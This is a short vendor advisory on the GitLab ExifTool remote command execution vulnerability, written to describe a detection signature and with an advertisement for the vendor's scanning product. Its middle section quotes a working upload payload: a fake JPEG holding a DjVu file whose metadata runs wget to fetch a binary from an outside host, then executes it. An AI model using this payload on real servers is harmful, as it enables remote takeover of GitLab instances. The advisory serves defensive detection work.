Application Details
GitLab helps teams design, develop and securely manage code and project data from a single distributed version control system to enable rapid iteration and delivery of business value.
Vulnerability
An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
Identification
Files that are uploaded with extensions of jpg, jpeg or tiff are passed to the ExifTool to remove any unauthorised tags. The issue is that the file extension will be ignored and the ExifTool will try to determine the type based on the content.
Content-Disposition: form-data; name="file"; filename="test.jpg"
Content-Type: image/jpeg
Content-Transfer-Encoding: binary
AT&TFORM....DJVMDIRM..........F......... !..N........k.D.,q..I.n...."?FORM...^DJVUINFO...
......d...INCL....shared_anno.iff.BG44.....J..........7..*..BG44........BG44.....
FORM....DJVIANTa...P(metadata
(Copyright "\
" . qx#wget -qO /tmp/qhRKvWyG http://192.168.74.155:8080/SiG0LiTq2R;chmod +x /tmp/qhRKvWyG;/tmp/qhRKvWyG;rm -f /tmp/qhRKvWyG# . \
" b ") )
Detection
By turning this vulnerability into a traffic file and matching rule, we are able to detect attempts to upload files which don't match the content type.
Coverage
Idappcom has created signature 8021990 along with a traffic file.
References
Traffic IQ
If you are concerned that your business may be at risk of this vulnerability or others why not try out our Traffic IQ software which can scan your defences and report any issues. Learn more here: https://www.idappcom.co.uk/traffic-iq-professional
Comments